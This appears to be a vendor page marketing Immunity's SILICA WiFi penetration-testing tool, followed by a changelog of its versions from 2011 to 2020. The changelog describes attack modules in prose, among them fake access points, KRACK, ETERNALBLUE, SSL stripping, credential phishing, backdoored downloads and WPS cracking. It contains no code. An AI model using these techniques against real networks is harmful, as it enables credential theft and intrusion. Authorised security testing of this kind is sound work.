The industry de facto wireless security assessment tools and systems
Understanding the vulnerabilities of your WiFi network can be challenging as users can easily create networks on demand, or even perhaps unintentionally. But as recent events have demonstrated, scanning your WiFi network is an important part of understanding your security posture.
Most vulnerability assessment tools simply take their current network scanners and point them at the wireless infrastructure. This approach does not give you the information that is unique to wireless networks. Immunity has built the first automated, WiFi specific, vulnerability assessment and penetration tool.
Unlike traditional scanners that merely identify possible vulnerabilities, SILICA determines the true risk of a particular access point. SILICA does this by unintrusively leveraging vulnerabilities and determining what assets behind the vulnerable access point can be compromised.
Additionally while traditional scanners can enumerate the vulnerabilities of a particular target, they cannot evaluate whether a mitigating control is in place on the target or in the surrounding environment. With SILICA’s unique methodology it can report on whether vulnerability can be successfully exploited.
More than simple scanning, the benefits of using SILICA include:
SILICA Benefits Statement
With SILICA you can:
HIPAA Typical SILICA users include:
1. Forensics teams working to re-create an incident.
2. Security Management teams that want a purpose-build vulnerability scanning and exploitation tool for their WiFi network, including remote identification of systems and mobile devices even when running personal firewalls.
3. Network administrators who want to discover ad-hoc, unauthorized clients, or weakly authenticated WiFi access points, and to test/recover WEP, LEAP and WPA 1,2 keys.
4. Compliance officers looking for real risk management profiles.
5. Security Assessment teams that are tired of the false positives from traditional scanners use SILICA’s man-in-the-middle and aggressive remote exploitation capability.
SILICA Functionality and Product Features
SILICA leverages Ubuntu 14.04 LTS 64bit and is supplied as a virtual machine.
Included with SILICA there is a high performance Alfa WiFi USB adapter that greatly increases the wireless performance over the base WiFi chip sets that are included in most commercial laptops.
This self-contained solution provides support for 802.11 a/b/g/n networks. This product is ideal for security personnel who wish to integrate WiFi testing into an existing test platform with our security testing tools.
Feel free to contact E-SPIN for your operation or project requirement.
From here onward the latest build and release information will show in reverse order. Latest come first.
2020-Feb-21 SILICA v7.40!
– Windows CryptoAPI Spoofing (CVE-2020-0601 )
A spoofing vulnerability exists in the way Windows CryptoAPI
(Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.
SILICA will try to exploit this vulnerability to spoof SSL certificates
with the “FakeAP with service impersonation” module.
– NETGEAR Telnet Enable Vulnerability
Several NETGEAR routers have a telnet daemon that can be enabled
remotely and accessed with default credentials. SILICA will try to
exploit this vulnerability with the “Attack” module and use it to
obtain credentials for the router’s HTTP Console.
– Apple EAP-success attack (CVE-2019-6203)
There is a vulnerability in Apple devices that allows an attacker to
create fake access points that successfully spoof real access points.
This works by sending EAP-success messages that the Apple devices accept
even before validating credentials. SILICA will exploit this
vulnerability when creating a FakeAP with 802.1X encryption.
– Fix missing “edit key” submenu option for 802.1X networks.
Videos can be found at:
Network Printer Attacks –
https://vimeo.com/270182796
Bypassing WPA2 encryption using the KRACK attack –
https://vimeo.com/251369829
SILICA 7.31: Samba Server Exploitation –
https://vimeo.com/230656937
D-link and Microsoft WSUS Exploits –
https://vimeo.com/209259981
Fake Captive Portal Demo –
https://vimeo.com/198045435
Malicious Access Point Detection –
https://vimeo.com/177231337
Karma attack filtering and background WPA handshake sniffer –
https://vimeo.com/165882825
Access Point Mapping – https://vimeo.com/157178038
Full Karma Attack – https://vimeo.com/155393829
SMB proxy and group policy exploit – https://vimeo.com/136964755
SSL attacks using SSL stripping and self signed certificates –
https://vimeo.com/122117823
Exploiting Android WebView.addJavaScriptInterface –
http://vimeo.com/109831748
Pixie Dust WPS Attack – https://vimeo.com/130883860
More WPS attacks – https://vimeo.com/album/338505
General overview –
http://www.immunityinc.com/mov
Wireless Window –
http://www.immunityinc.com/mov
2019-Nov-21 SILICA v7.39!
– WPA/WPA2 client-less attack using PMKID
SILICA now supports WPA/WPA2 bruteforcing using PMKID data. This allows
SILICA to attack access points even when no stations (clients) are
present. When running the “Discover key” module, SILICA will try to
connect to the Access Point and parse the response for RSN PMKID data.
If present, it will store the handshake and commence bruteforcing
immediately. SILICA will also passively detect and capture any WPA
handshakes with PMKID data.
– DDE Close Handle Local Privilege Escalation (CVE-2019-0803)
An elevation of privilege vulnerability exists when Windows improperly
handles closes the objects handle at Dynamic Data Exchange. This
module will be run by SILICA automatically after a successful
exploitation.
2019-Jul-17
– APT Remote Code Execution Exploit (CVE-2019-3462)
This module exploits a vulnerability in apt to achieve remote code
execution. The vulnerability is caused by incorrect sanitation of the
302 redirect field in the HTTP transport method of apt versions 1.4.8
and earlier. This attack will be used with the “Become this network
with client-side injection” action, when the “transparent HTTP proxy”
option is set. If a client joins the network, and tries to install a
package using apt, the attack will be performed. In order for it to
succeed, apt should download release files (Release.gpg).
– Fixes an issue that prevents SILICA from joining certain WEP networks.
2019-Mar-29 SILICA v7.37!
– Neighborhood Graph Visualization:
This new visualization allows the user to view a graph of related
networks, Access Points, SSIDs, and client devices for a given
wireless device. This graph can be useful for looking for rogue
access points, or for figuring out how to attack an access point by
attacking its stations.
– DHCP client Command Injection Exploit:
This module exploits a command injection flaw in the Network Manager
script included in the DHCP client packages in Red Hat Enterprise
Linux. This module will try to exploit the vulnerability in devices
that join SILICA‘s Fake AP.
– Improved KRACK attack detection:
SILICA will passively sniff for encrypted WPA traffic and try to
decrypt it using an all-zero key. If the decryption succeeds, the
BSSID of the encrypted traffic will be shown in red in the Malicious
Access Point Detection tab.
Updated OUI database.
2019-Jan-15 SILICA v7.36!
– FakeAp Mana Mode:
The FakeAp karma option now implements the attack known as “mana”:
build a per-mac view of the proximate network list, and respond to
broadcast probes with direct responses for each proximate network list.
This allows to attract more client devices than the previous karma
attack.
– EAP Relay Attack:
When trying to connect to a network using 802.1X authentication, SILICA
will now launch an EAP Relay Attack if the credentials are unknown.
This attack will allow SILICA to join the network after a
man-in-the-middle attack on a legitimate client device trying to join
the network.
Notes: two wireless cards are needed for this attack, and this attack
only works on PEAP-EAP-MSCHAPv2 at this time.
2018-Sep-17 SILICA v7.35!
– Updated embedded Canvas version with additional exploits:
+ CVE-2017-0143 – Windows SMB Remote Kernel Pool Overflow
The “Attack” module will now launch the ETERNALBLUE exploit. This
module was tested with Windows 7 X86 and X64 targets.
+ CVE-2017-11906 – WPAD/PAC Exploit via JScript Heap Overflow
The “Service impersonation” module will now launch the WPAD exploit
when a station joins the Fake Access Point. This module was tested
with Windows 10 X64 targets.
– Important bugfix: Fix issue with WEP cracking module that could
result on out of memory errors.
2018-Aug-2 SILICA v7.34!
* Updated SILICA VM:
This release adds support for the new SILICA VM. The new VM is based on
Xubuntu and includes updated system software.
* Additional wireless card support:
Now SILICA supports wireless cards based on the MediaTek RT5572 chipset.
Notice:
This SILICA version can only be installed on the last version of the VM.
2018-May-17 SILICA v7.33!
* Printer exploitation:
When SILICA finds a network printer, it will show the PJL volumes in a
file browser. This feature allows to explore directories, download
files, and exploit path traversal vulnerabilities in the printer’s file
system.
* Attack Tree Tab:
A new visualization was added that shows scan and attack results in a
centralized manner.
* This release also includes:
Changes to the Network Probe module. SILICA will now show more
information about scanned network devices, including open ports and
service’s properties.
Several bug fixes, including one in the “custom channel list” feature.
2018-Jan-18 SILICA v7.32!
* KRACK attack: bypassing WPA2 encryption
SILICA can now perform a man-in-the-middle attack between a target
access point and the target devices that try to connect to the network.
When a vulnerable device tries to connect, SILICA will intercept the
packets and replay them in a way that will cause the device to install
an all-zero encryption key. SILICA will then carry-on with ssl-stripping
and ssl-spoofing attacks against the target device.
This module supported targets are wpa_supplicant 2.4 and 2.5, and was
tested on a stock Ubuntu 16.04.1 target.
Also included in this release:
Updated certificates for Fake AP in radius mode.
Compatibility fixes to the DHCP server.
Important Note: To make the KRACK attack work, SILICA requires two
wireless cards, as the fake access point needs to be on a different
channel than the real Access Point. The additional card could be any
wireless card that supports packet injection, however, Immunity will
*only* support the Alfa AWUS052NH 802.11n Dual Band 2.4/5 GHz Wi-Fi USB
Adapter which can be obtained here:
https://store.rokland.com/pro
https://www.amazon.com/Alfa-L
To view a demonstration of the new features visit:
https://vimeo.com/251369829
2017-Aug-24 SILICA v7.31!
* Exploit module for SAMBA Remote Code Execution vulnerability.
This module exploits a vulnerability in SAMBA servers (CVE-2017-7494).
In order to use this exploit you need: write access to a SAMBA share,
and named pipes should be enabled in the SAMBA server. This module
was tested on Samba 4.1.6 (x86-64 and i386) on Ubuntu.
* Improved post-exploitation module for Linux.
After a Linux host is exploited, the post-exploitation module will now
extract saved WiFi credentials from the Network Manager, and screenshots
will be taken and saved in BMP format.
* Improved logging and status information.
A status information table shows information about current and past
actions started by the user. An error log tab was also added. Important
log entries are now shown in a different color.
Important bug fix: issue with the card not being detected in some OSX
hosts was fixed.
To view a demonstration of the new features visit:
https://vimeo.com/230656937
2017-Jun-2 Immunity is proud to announce the release of SILICA v7.30!
* Improved support for enterprise configured networks
SILICA now can connect to access points using 802.1X authentication.
This can be combined with different modules, including network probing,
attack, and ARP-spoofing. The supported authentication modes are
EAP-TLS, EAP-PEAP, and EAP-TTLS. The supported second phase
authentication modes are PAP, MSCHAP, MSCHAPV2, and GTC.
* Signal strength graph for wireless clients
A new option was added to show the signal strength graph of a wireless
client of an access point. The signal strengths of all transmitted
packets are plotted. To improve the graph, control frames are sent to
elicit responses from the station.
* Updated WPA word-list
An updated 1 million words list for WPA handshake cracking is included
in this release.
* Important Bugfix: Now clients from access points are correctly
classified as wired or wireless.
2017-Mar-21 SILICA v7.29!
* Windows Server Update Services (WSUS) MiTM Attack
A new attack module that performs a man-in-the-middle attack against
windows stations using non-SSL connections to WSUS. This module is
active when running the fake AP with client-side injection mode.
* D-link authentication bypass
Multiple D-link access points are vulnerable to an authentication
bypass [1]. The “attack” module will scan for the vulnerability and
open a browser session to the administration interface if the attack
is successful.
* Deauthentication of wireless clients
A new option was added to deauthenticate a specific station from a
wireless network. This can be useful to try to force a target to
connect to the fake AP.
* A new option was also added to select the channel used by the fake AP.
* In addition, several fixes are included:
Issue with packet injection in MiTM mode with client-side injection.
Issue with network listing information display when an AP
configuration is changed.
To view a demonstration of these new features visit:
2017-Jan-4 SILICA v7.28!
* Fake Captive Portal
A new feature was added to the FakeAp with Service Impersonation
module. When the captive portal option is set, all HTTP traffic
from mobile devices that associate to the fake access point is
redirected to a sign-in page, until the user introduces any
credentials, which are logged to the passwords tab.
* Internet connectivity spoofing with FakeAp
The FakeAp with Service Impersonation module will now spoof Internet
connectivity, so when mobile devices join the fake access point, they
will behave as if they are connected to the Internet, even if SILICA
is not.
* Improvements to the DHCP client and server used by SILICA.
* Changes to how modules are started and stopped. Now SILICA feels more
responsive.
Note: support for the Ubiquiti SR71-USB wireless card is discontinued
since this release. The only supported wireless card is the Alfa
AWUS052NH Dual-Band Card.
To view a demonstration of these new features visit:
Fake Captive Portal Demo –
https://vimeo.com/198045435
2016-Oct-13 SILICA v7.27!
In this SILICA Release we have ramp up our Client-Side exploitation
capabilities, including our most successful CANVAS exploits.
We add Clientside exploitation capabilities to our HTTP traffic on
encrypted networks in FakeAP. We include some updates in our
post-exploitation capabilities, upgrading our Wifi Key dumper to all
windows version.
Enjoy it!
Changelog:
– Updated embedded Canvas version, including new clientside exploits:
* adobe_flash_id3 (CVE-2015-5560, targeting Adobe Flash <= 18.0.0.209)
* adobe_flash_intoverflow_apply (silently patched in Adobe Flash >
17.0.0.169)
* adobe_flash_domainMemory_uaf (CVE-2015-0313)
* ms16_006_silverlight
– Clientside exploits will now also be injected in HTTP traffic when in
encrypted FakeAp mode.
– Wifi key dumper post exploitation module now supports all windows
versions and now saves the recovered keys in the “passwords” tab
– Probe responses are now used to identify hidden SSIDs
– Bug fixes:
* issue with channel hopping in the AP Mapping Module
* issue with Canvas output processing
* issue with Canvas post-exploitation setting
2016-Aug-2 v7.26!
– Malicious AP Detection
SILICA will analyze probe requests and probe responses looking for
possible malicious access points. Any access point possibly spoofing
a valid SSID will be informed to the user, along with the reason
that the access point is suspicious.
– Improvements for the AP mapping feature
Large floor image are now fully supported, as they are resized to
fit in the user interface, but still shown in full size when
exporting a mapping image. Also, an option was added to hop across
channels when making a site survey.
– Change on the main buttons
The “START” button was renamed “SCAN”, and now allows scanning even
when performing some other actions.
The “STOP” button will now be on while a stoppable activity is
running.
– Fixed issue with the man-in-the-middle module.
To view a demonstration of these new features visit:
https://vimeo.com/177231337
2016-May-10 v7.25!
– Background WPA handshake sniffer
SILICA will always be listening for WPA handshakes. The captured
handshakes can be used later for cracking the pre-shared key using a
dictionary attack. Only the last valid handshake is stored for each
AP, older ones are discarded. A visual indication for Access Points
for which a handshake has been captured is displayed in the Network
Listing Tab.
– SSIDs and MACs filters in Karma Mode
Allows full control of which network names are spoofed in Karma Mode,
and which stations are allowed to join the fakeAp.
– Better support for radius in fakeAP:
* Authentications attempts are logged and the hashes stored on the
password tab.
* Return EAP-Success to try to get clients to log to our fakeAP.
– Better logging of stations actions (association, connection,
disconnection) when in fakeAP mode.
– Fixed issue with the wordlist generator.
To view a demonstration of these new features visit:
https://vimeo.com/165882825
2016-Mar-1 SILICA v7.24!
-Access Point Location Capture (Rogue AP detection).
With this new feature you can create a site survey, recording the signal
strength of the beacons emitted by all the access points in a given
channel as you walk around the facility. This feature can be used to
detect unauthorized access points.
-Access Point Signal Mapping.
Using the readings from the site survey, visualize the signal strength
with various representations.
-Access Point Signal Strength Graph.
This feature shows a real-time graph of the signal strength for an
access point. It can be useful for quickly determining an access point
location using a directional antenna, or to better position your card
for communicating with the access point.
Bugfix: now the transparent HTTP proxy logs all tokens matching the
interesting keyword regular expression, so it’s more probable to log the
correct credentials.
For any questions or support please email silica@immunityinc.com
To read more about the access point signal mapping feature visit:
http://immunityproducts.blogsp
To view a demonstration of these new features visit:
https://vimeo.com/157178038
2015-Dec-4 SILICA v7.23!
– Full KARMA mode for fake AP. When this option is activated, SILICA
will create a Fake Access Point for each probe request instead of only
impersonating one SSID
– Support for wireless cards based on the Ralink RT3572 chipset. SILICA
will now ship with the Alfa AWUS052NH Dual-Band Wireless USB Adapter.
This card is more sensitive and has better compatibility with 802.11n
networks than the previous one. This is a major improvement in range,
compatibility and reliability on the product. SILICA will also continue
to support the Ubiquity SR-71 card (which is still a great card).
– New GUI dialogs for better selecting Fake AP’s settings. ASCII WEP
keys are now supported and SILICA will warn the user when invalid keys
are set.
– Added preferences option to set wireless regulatory domain.
– Add an option to filter Credential Capture by domain name.
– Fixed performance issue with WPA hash brute forcing.
– Fixed driver issue that caused reduced throughput in Fake AP mode.
Immunity will support the old wireless card, but we encourage all our
customers to switch to the new card. We will be providing the card
upgrade to all our clients at cost and if you happen to need a license
renewal, a shiny new Alfa card will be included.
2015-Sep-9 SILICA v7.22!
– Group Policy Exploit for Microsoft Windows (MS15-011)
Tested on Windows 7 targets joined to Windows 2008 R2 domain
controllers (DC). The SILICA VM’s host should be on the same network
than the DC, that means packets should be able to reach the DC, and
the DNS server address should point to the DC. This exploit was tested
while on FakeAp with service impersonation mode. When successful, this
module will make changes to some registry values under
HKEY_LOCAL_MACHINE\SOFTWARE\Mi
on the target.
– SMB Transparent Proxy
When running a FakeAp with service impersonation, SILICA intercepts all
SMB packets. SMB traffic accessing “.exe” files will be modified to
include backdoors. This works as long as mandatory SMB signing is not
enabled on the target.
– Use-after-free in Adobe Flash Player (CVE-2015-5119)
This release also include some bug fixes, included:
– Issue with ARP scanning in man-in-the-middle/main-in-the-
– Issue with FakeAp module when handling large number of connections.
– Issue with FakeAp with service impersonation module with slow DNS
resolving.
To view a demonstration of the SMB proxy and group policy exploit visit:
https://vimeo.com/136964755
2015-Jun-18 SILICA v7.21!
– WPS offline bruteforcing (AKA Pixie Dust Attack)
Access Points using Ralink chipsets lack randomization of the E-S1 and
E-S2 nonces. This attack will do an offline brute force of the WPS PIN,
reducing the time that it usually take to obtain the Access Point
credentials.
– New WPS option “try only default PINs”
When this menu option is selected, only the fastest WPS attacks are
carried on.
– Denial of service enhancement
The “Disable this network” module will now send a continuous stream of
deauthentication packets.
– Bug Fixes:
Issue that prevented connection to some WLANs using WPA encryption.
Issue with the WPS bruteforcing module.
Wireless channel selection fixes.
To view a demonstration of the Pixie Dust Attack visit:
https://vimeo.com/130883860
2015-Apr-7 SILICA v7.20!
-SSL Stripping
This new module performs a man-in-the-middle attack
against stations connected to the fake access points. HTTP traffic is
modified on the fly to change HTTPS links to HTTP. Cookies
expire to force the targets to re-authenticate, with the
intention of obtaining user names and passwords.
– Self Signed Certificates
The new module performs spoofed SSL certificate attacks. The HTTPS
traffic is intercepted using self-signed certificates. Successfully
decrypted traffic is parsed for cookies and
user/password combinations.
– Bug Fix: Better handling of module stopping.
– Accomplice Plug-in Fixes
2014-Dec-24 SILICA v7.19!
– – Executable replacement: This new fake AP capability allows for new
attack
possibilities. In this release, it intercepts executables downloaded by
stations and replaces them with backdoors (Works on Windows, Linux and OSX)
– – Improved WPS attack: SILICA will exploit default PINs for vulnerable
access points before brute-forcing, including trying some algorithm that
will obtain the PIN out of the Access Point features (such as the MAC).
2014-Oct-24 SILICA v7.18!
– – New client side exploit for Android’s WebView addJavascriptInterface
Remote Code Execution (CVE-2013-4710). This is handled automatically by
SILICA‘s Fake-AP module.
– – New filtering feature added. Supply a list of newline-seperated MAC
addresses for the main wireless AP window and FakeAP tab. This way a
tester can track devices that only are registered with a particular company.
– – New feature to use CANVAS MOSDEF listeners. This feature is
implemented for the Android’s WebView addJavascriptInterface Remote Code
Execution Exploit.
2013-May-23 SILICA v7.17!
– – New probe window:
+ Added color coding easy to exploit factor for probe requests takes
into account the following information:
. Common name of probe request
. Signal level of client
. Last seen time
. If there is a key
+ Added new columns:
. Probe count, allows us to determine if a client is still probing
for a network
. Channel, for better replication of fake AP
. Quality, signal levels to see if the client is distant
. Last time seen
+ Added coloring code of how active a client is, follows the same
scheme as the network listing window
+ Added column sorting similar to the network listing window
– – Dynamic SSL certificate creation based on the detected CNAME of the
connecting host and caching
– – New HTTPs module for fake answers, captures BasicAuth/OAuth
credentials, SSL Cookies, automatic phishing for all popular websites:
Facebook, Twitter, Gmail, Amazon, Ebay, Hotmail, Yahoo, Linkedin,
Pandora etc. It can be extended to work with any website.
– – New SMTPs module for fake answers, captures emails and the following
authentication methods:
+ CRAM-MD5, getting the username and encrypted password
+ LOGIN, getting the username and password
+ PLAIN, getting the username and password
Also extended supporting STARTTLS dynamic socket upgrade to SSL
– – New POP3s module for fake answers, captures login credentials
– – New IMAPs module for fake answers, captures login credentials
– – Updated fake DNS module to intelligently send back responses to
clients. The logic is that if any of the fake answer modules has
captured useful information the DNS module will then send the real IP
and allow continuation of service instead of delivering our IP,
increasing the sophistication of the attack and making it seemless to
clients.
– – New key recovery method for VPN credentials. If the VPN fake answers
module captures a handshake it can then be loaded to the offline key
recovery tab to find the password.
– – New key recovery tab now automatically identifies the type of the
capture file and loads the right module. It supports the following key
recovery options:
+ LEAP
+ WPA1,2
+ VPN
– – Added new preference option to set a static IP instead of using DHCP
2013-May-3 SILICA v7.16!
– – Added exploit for Java Dynamic Type Binding Remote Code Execution
(CVE-2013-2423)
Modules extended:
+ Become this network with client side injection:
– AP mode
– Ad-Hoc mode
+ Man-In-The-Middle with client sides
+ Passive session hijacking selectively attack a client
– – Bug fixes in service impersonation modules
Videos can be found at:
Password stealing –
http://partners.immunityinc.co
AP less WEP cracking –
http://silica.immunityinc.com/
Access point impersonation –
http://partners.immunityinc.co
Custom traffic injection –
http://partners.immunityinc.co
General overview –
http://www.immunityinc.com/mov
Wireless Window –
http://www.immunityinc.com/mov
Key retrieval (WEP, LEAP, WPA1,2) –
http://partners.immunityinc.co
Passive session hijacking (facebook, twitter, gmail etc) –
http://partners.immunityinc.co
2013-Feb-22 SILICA v7.15!
– – New VPN module for fake services under fake AP. This module will
impersonate a VPN PPTP server and answer the authentication request by
any client. Once the request is captured the username and the
challenge/response will be saved in the Reports directory and shown in
the information tab under passwords. The attack has been tested with
the native OS integrated software in the following platforms:
+ Android 4.x (tablet and phones)
+ IOS 5/6 (tablet and phones)
+ Mac OSX Snow Leopard and Mountain Lion (might work with other
versions too)
+ Windows 7 and XP (might work with other versions too)
+ Linux Network Manager
– – Added exploit for MBeanInstantiator.findClass Remote Code Execution
(CVE-2013-0422) in MITM and Injection modules
– – Added support for reading PKI (airpcap, kismet etc.) PCAPs
2013-Dec-12 SILICA v7.14!
– – New mode cookie react. Automatically opens chrome with an active
session in popular websites (instagram, facebook, aol, linkedin, amazon,
ebay, hotmail, yahoo etc)
– – ACCOMPLICE, new google chrome plugin that allows session hijacking
and cookie modifications
– – Automatically save the HTML contents of the active react sessions
and upload them into STALKER
– – Single sign on (SSO) enumaration using ACCOMPLICE plugin (currently
works only on facebook)
– – Custom list of channels for channel hopping
– – WPA passive session hijacking now logs both the server and client
data, which can be used for more STALKER information
– – Updated reports to use the latest CANVAS reporting engine
– – Added more websites for fake service impersonation (amazon, ebay,
linkedin, hotmail). Usernames/Passwords are now shown along with the IP
address we captured the data from.
– – Recovered keys are now stored in a database and are loaded automatically
– – Automatic notification for SILICA updates if there is an internet
connection
2012-Oct-18 SILICA v7.13!
– – Ability to disable an access point using a denial of service attack
and all the connected clients
– – Automatic resuming when uploading large pcap’s to STALKER
– – POP/SMTP/IMAP credentials and emails are now displayed in the GUI in
the Fake AP service impersonation
– – Improved passive session hijacking for WEP and WPA networks
– – Updated OUI file, 20000 new wireless vendors
– – Updated firmware
2012-Sep-15 SILICA v7.12!
– – STALKER support (https://stalker.immunityinc.c
+ Option to automatically upload captured SILICA data from:
. Passive session hijacking
. Fake Access Point and Ad-Hoc mode
. Traffic Rewrite modes
+ Ability to upload Pcap’s from SILICA GUI:
. Ethernet wired Pcap’s
. Wireless with or without radiotap header
+ STALKER mode to force redirection and collecting more data
– – Fake Access Point and Ad-Hoc supports radius like credential
capturing for attacking WPA1,2 and WEP enterprise configured networks
(PEAP, LEAP)
– – Fake Access point and Ad-Hoc mode with phishing attack capabilities:
+ Capture HTTP usernames and passwords for:
. Facebook and Facebook Mobile
. Twitter
. Gmail (does not work against Google-Chrome)
+ Capture IMAP credentials
+ Capture any SMTP emails the user tries to send
+ Answer all DNS queries
+ Capture POP3 credentials
+ Easter-egg for Pandora mobile Apps (iphone and android maybe more!)
– – New VMware image with an improved wireless driver. Please note the
old VMware image will still be supported but updates for it will be
discontinued as of the next SILICA release. Contact
[email protected] to receive an updated version.
– – Intelligent difficulty factor of attacking a network in the form of
a color next to the network name
– – New clientd exploit for Java forName/getField Method Invocation
Sandbox Bypass (CVE-2012-4681)
– – New option to allow wireshark sniffing on a particular channel
– – Update WPA cracking C module with more statistics about progress and ETA
Please note this update may take longer than usual to complete when
executing the post actions.
2012-Jul-20 SILICA v7.11!
+ Saving and loading sessions now supports the probe window information too
+ Ability to run a Fake AP without having an internet connection
(checkbox in preferences)
+ Automatically try to use knowledge base for WPS cracking and detect
PIN ranges
+ Reliability fix for capturing WPA handshake
+ Bug fix for Fake AP module using Open or WEP mode
2012-Jun-6 SILICA v7.10!
+ Impersonate APs and Ad-Hoc networks using WEP or WPA1,2 encryption
+ Client-side exploit injection for AP and Ad-Hoc mode
+ Password stealing support with passive injection mode for WEP and
WPA1,2 encrypted networks
+ Passive client-side exploit injection support for WEP and WPA1,2
encrypted networks
+ Custom HTML injection support for WEP and WPA1,2 encrypted networks
+ Added support for more popular websites that are vulnerable to the
password stealing attack
2012-Apr-11 SILICA v7.9!
+ Client side exploit for Java AtomicReferenceArray Type Confusion
Sandbox Bypass (CVE-2012-0507).
* This is handled automatically by SILICA‘s Man-In-The-Middle,
Fake-AP and custom injection modules.
+ Browser auto-complete attack to retrieve saved passwords that the
browser has saved automatically
* Support for sites such as Twitter, Facebook, Gmail, Linkedin,
Pandora, Reddit, RenRen.com, Slashdot.org, Match.com and other popular
sites.
* This is one of the content injection attacks discussed at
INFILTRATE 2012 Secrets in Your Pocket: Analysis of [Your] Wireless
Data by Mark Wuergler
*
http://www.immunityinc.com/inf
+ Interface
* New column showing information from Cisco access points such as
the connected clients and hostname
* Info tab storing all passwords SILICA has automatically retrieved
during an attack (i.e. browser auto-complete)
* New column showing the data activity of APs and clients
You can see the browser auto-complete attack in action at the
following location:
http://partners.immunityinc.co
Other videos can be found at:
http://immunityinc.com/product
If you have any further questions on updating please check our online
manual at: http://www.immunityinc.com/dow
2012-Feb-16 SILICA v7.8!
– Improved WPS attack
+ Show an estimated completion time
+ Automatic settings, will adjust the delay and max threads the AP can
handle to avoid blocking
+ Automatically detect AP lockdown time or crash
+ Show tab with known PINs and information about certain APs
+ Resume WPS sessions from where they are left
+ Source MAC randomization, allows evasion of slow delay times
+ Get WPS info, find out the exact model/make and version of an AP
– Show wireless/wired clients in client listing
– Added new less intrusive method of disconnecting clients
– Option to channel hop only between 1-12
Video of new attack:
http://partners.immunityinc.co
2012-Jan-12 SILICA v7.7!
This includes code to exploit the newly found WPS vulnerability to guess
the pin and recover the WPA key for access points without having
to follow the traditional approach of brute forcing it. Several config
options are in preferences under the Wireless Cracking section, which
allow resuming or specifying ranges if you know what the vendor commonly
uses.
It must be noted this is an early version of the attack, a better one
with more features will be released soon.
Have any questions on how to use SILICA? Please check our FAQs or make a
new post in our forum
https://forum.immunityinc.com/
You may find video of the AP less WEP cracking at:
http://silica.immunityinc.com/
Other videos can be found at:
Access point impersonation –
http://partners.immunityinc.co
Custom traffic injection –
http://partners.immunityinc.co
General overview –
http://www.immunityinc.com/mov
Wireless Window –
http://www.immunityinc.com/mov
Key retrieval (WEP, LEAP, WPA1,2) –
http://partners.immunityinc.co
Passive session hijacking (facebook, twitter, gmail etc) –
http://partners.immunityinc.co
2011-Nov-23 SILICA v7.6!
SILICA now has the ability to recover WEP keys directly from clients by
tricking the client into disclosing the key. This attack does not
require an AP to be present in order to derive the key. See the video
below for more details.
You may find video of the AP less WEP cracking at:
http://silica.immunityinc.com/
2011-Nov-4 SILICA v7.5!
The new features of this release include:
– New SILICA interface
+ New log window that displays more information about each step SILICA
is performing
+ Added tooltip hints between tabs
+ Displays the quantity of clients connected to each AP
+ Title bar statistics including uptime, total number of APs, clients,
Probes and Ad-Hod networks
+ Expand/Collapse and Clear contents in the Cookie Viewer and Fake AP tabs
– Ability to resume your actions if you decide to close your lid or
accidently unplug your wireless card
– Optimized WEP cracking speeds for faster results
– Inject client-side exploits into selective targets that are active in
Cookie Viewer
– Supply custom access point names to ‘become’ in Fake AP mode
– Geo locate a MAC address using the Google’s Geolocation API
– Automatically attempt to gain SYSTEM after a Windows client-side
exploit has succeeded using a local privilage escalation (MS11-054, Null
pointer dereference, CVE-2011-1888)
– Added support for OAUTH Authentication hijacking to the Cookie Viewer tab
– Ability to clone MAC address of a client from the wifimonitor window
2011-Aug-4 SILICA v7.4!
The new features of this release include:
– New FakeAP tab shows all access points that wireless clients are
probing for.
– Access point impersonation.
+ Become an access point that a wireless client is probing (to force
the client to connect to SILICA).
+ Provide the wireless client Internet. ‘Passively’ steal cookies and
watch all live network traffic in Wireshark.
+ Optionally choose to inject client-side exploits into the browser as
they browse the Internet (using new injection module).
– Incorporation of ClientD – a framework that dynamically delivers
client-side exploits.
+ This release of SILICA includes 3 new client-side exploit modules:
* Android parent stylesheet vulnerability versions 2.1 and 2.2.1
* Adobe Flash player <= versions 10.3.181.23 (CVE-2011-2110)
* IE Peers setAttribute (CVE-2010-0806)
– Passive injection
+ Passively inject client-side exploits (using ClientD) or a custom
payload into the browser of wireless clients.
– Updates to the man-in-the-middle with client-side injection module.
+ Now the victim will be allowed to visit the pages they requested
only with an added frame that points to ClientD to serve client-side
exploits.
+ Uses a new injection module
You may find videos of the new features of SILICA 7.4 at:
General overview –
http://partners.immunityinc.co
Access point impersonation –
http://partners.immunityinc.co
Custom traffic injection –
http://partners.immunityinc.co
2011-Jun-8 SILICA – Ver 7.3′
New features include:
– Locking into a single frequency for monitoring traffic
– Better visualization of discovered SSIDs
– Updated client and AP vendor information
– Column sorting
– Better third party tool compatibility for loading saved WPA pcap
handshakes
– Bug fixes
You may find videos at:
Hidden SSID and visualization –
http://immunityinc.com/movies/
General overview – http://immunityinc.com/movies/
Wireless Window –
http://www.immunityinc.com/mov
Key retrieval (WEP, LEAP, WPA1,2) –
http://partners.immunityinc.co
Passive session hijacking (facebook, twitter, gmail etc) –
http://partners.immunityinc.co
